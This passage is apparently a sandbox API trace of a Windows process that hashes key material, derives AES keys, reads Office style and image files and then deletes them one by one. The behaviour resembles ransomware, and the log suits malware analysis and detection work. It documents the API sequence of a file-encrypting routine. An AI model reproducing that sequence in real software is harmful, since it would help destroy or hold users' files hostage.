[0160.674] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.676] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.676] CryptHashData (hHash=0x284d5e8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.676] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0160.676] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x715 [0160.676] ReadFile (in: hFile=0x4cc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.686] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0160.686] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0160.686] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.687] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Maroon.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\maroon.css")) returned 1 [0160.688] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.689] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.689] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.689] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HEADER.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HEADER.GIF", lpUsedDefaultChar=0x0) returned 11 [0160.689] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_OFF.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_OFF.GIF", lpUsedDefaultChar=0x0) returned 12 [0160.689] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_ON.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_ON.GIF", lpUsedDefaultChar=0x0) returned 11 [0160.689] FindNextFileW (in: hFindFile=0x284d668, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 0 [0160.689] FindClose (in: hFindFile=0x284d668 | out: hFindFile=0x284d668) returned 1 [0160.689] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Oasis.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Oasis.css", lpUsedDefaultChar=0x0) returned 10 [0160.690] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.690] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.690] CryptHashData (hHash=0x284d668, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.690] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0160.690] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd80 [0160.690] ReadFile (in: hFile=0x4d0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.704] CryptDestroyHash (hHash=0x284d668) returned 1 [0160.704] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0160.704] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.705] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Oasis.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\oasis.css")) returned 1 [0160.706] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OliveGreen.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OliveGreen.css", lpUsedDefaultChar=0x0) returned 15 [0160.707] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.707] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.707] CryptHashData (hHash=0x284d5e8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.707] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0160.707] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x74f [0160.707] ReadFile (in: hFile=0x4cc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.738] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0160.738] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0160.738] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.740] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\OliveGreen.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\olivegreen.css")) returned 1 [0160.741] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Premium.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Premium.css", lpUsedDefaultChar=0x0) returned 12 [0160.741] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.742] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.742] CryptHashData (hHash=0x284d668, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.742] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0160.742] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x705 [0160.742] ReadFile (in: hFile=0x4d0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.786] CryptDestroyHash (hHash=0x284d668) returned 1 [0160.786] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0160.786] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.788] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Premium.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\premium.css")) returned 1 [0160.789] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RTF_BOLD.GIF", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RTF_BOLD.GIF", lpUsedDefaultChar=0x0) returned 13 [0160.789] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="rtf_choosefont.gif", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rtf_choosefont.gif", lpUsedDefaultChar=0x0) returned 19 [0160.790] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.790] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.790] CryptHashData (hHash=0x284d5e8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.790] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0160.790] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x37a [0160.790] ReadFile (in: hFile=0x4cc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.839] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0160.839] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0160.839] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.840] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\rtf_choosefont.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\rtf_choosefont.gif")) returned 1 [0160.841] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="rtf_italic.gif", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rtf_italic.gif", lpUsedDefaultChar=0x0) returned 15 [0160.842] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.842] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.842] CryptHashData (hHash=0x284d668, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.842] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0160.842] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x354 [0160.842] ReadFile (in: hFile=0x4d0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.880] CryptDestroyHash (hHash=0x284d668) returned 1 [0160.880] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0160.880] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.881] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\rtf_italic.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\rtf_italic.gif")) returned 1 [0160.882] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="rtf_spellcheck.gif", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rtf_spellcheck.gif", lpUsedDefaultChar=0x0) returned 19 [0160.883] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.883] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.883] CryptHashData (hHash=0x284d5e8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.883] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0160.883] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa0 [0160.883] ReadFile (in: hFile=0x4cc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.885] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0160.885] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0160.885] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.886] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\rtf_spellcheck.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\rtf_spellcheck.gif")) returned 1 [0160.887] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="rtf_underline.gif", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rtf_underline.gif", lpUsedDefaultChar=0x0) returned 18 [0160.887] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.888] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.888] CryptHashData (hHash=0x284d668, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.888] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0160.888] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x35c [0160.888] ReadFile (in: hFile=0x4d0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.896] CryptDestroyHash (hHash=0x284d668) returned 1 [0160.896] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0160.896] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.897] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\rtf_underline.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\rtf_underline.gif")) returned 1 [0160.898] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.899] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.899] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.899] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_OFF.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_OFF.GIF", lpUsedDefaultChar=0x0) returned 12 [0160.899] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_ON.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_ON.GIF", lpUsedDefaultChar=0x0) returned 11 [0160.899] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 0 [0160.899] FindClose (in: hFindFile=0x284d5e8 | out: hFindFile=0x284d5e8) returned 1 [0160.899] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Slate.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Slate.css", lpUsedDefaultChar=0x0) returned 10 [0160.899] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.900] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.900] CryptHashData (hHash=0x284d5e8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.900] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0160.900] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xdbf [0160.900] ReadFile (in: hFile=0x4cc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.916] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0160.916] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0160.916] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.917] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Slate.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\slate.css")) returned 1 [0160.918] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SlateBlue.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SlateBlue.css", lpUsedDefaultChar=0x0) returned 14 [0160.918] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.919] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.919] CryptHashData (hHash=0x284d668, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.919] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d6a8) returned 1 [0160.919] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x74e [0160.919] ReadFile (in: hFile=0x4d0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.933] CryptDestroyHash (hHash=0x284d668) returned 1 [0160.933] CryptDestroyKey (hKey=0x284d6a8) returned 1 [0160.933] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.934] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SlateBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\slateblue.css")) returned 1 [0160.935] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.935] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0160.935] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.935] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="background.gif", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="background.gif", lpUsedDefaultChar=0x0) returned 15 [0160.936] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52568) returned 1 [0160.936] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0160.937] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.937] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0160.937] GetFileSize (in: hFile=0x4d0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1afa [0160.937] ReadFile (in: hFile=0x4d0, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0160.960] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0160.960] CryptDestroyKey (hKey=0x284d668) returned 1 [0160.960] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.974] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\softblue\\background.gif")) returned 1 [0160.975] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_OFF.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_OFF.GIF", lpUsedDefaultChar=0x0) returned 12 [0160.975] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 1 [0160.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TAB_ON.GIF", cchWideChar=-1, lpMultiByteStr=0x3269630, cbMultiByte=260, lpDefaultChar=0x3268e0f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAB_ON.GIF", lpUsedDefaultChar=0x0) returned 11 [0160.975] FindNextFileW (in: hFindFile=0x284d5e8, lpFindFileData=0x3268b28 | out: lpFindFileData=0x3268b28) returned 0 [0160.975] FindClose (in: hFindFile=0x284d5e8 | out: hFindFile=0x284d5e8) returned 1 [0160.975] FindNextFileW (in: hFindFile=0x284d5a8, lpFindFileData=0x32698b8 | out: lpFindFileData=0x32698b8) returned 1 [0160.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SoftBlue.css", cchWideChar=-1, lpMultiByteStr=0x326a3c0, cbMultiByte=260, lpDefaultChar=0x3269b9f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SoftBlue.css", lpUsedDefaultChar=0x0) returned 13 [0160.977] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52568) returned 1 [0160.977] CryptCreateHash (in: hProv=0xa52568, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0160.977] CryptHashData (hHash=0x284d5e8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0160.977] CryptDeriveKey (in: hProv=0xa52568, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0160.977] GetFileSize (in: hFile=0x4cc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xec4 [0160.977] ReadFile (in: hFile=0x4cc, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0160.979] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0160.979] CryptDestroyKey (hKey=0x284d628) returned 1 [0160.979] CryptReleaseContext (hProv=0xa52568, dwFlags=0x0) returned 1 [0160.981] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue.css" (normalized: 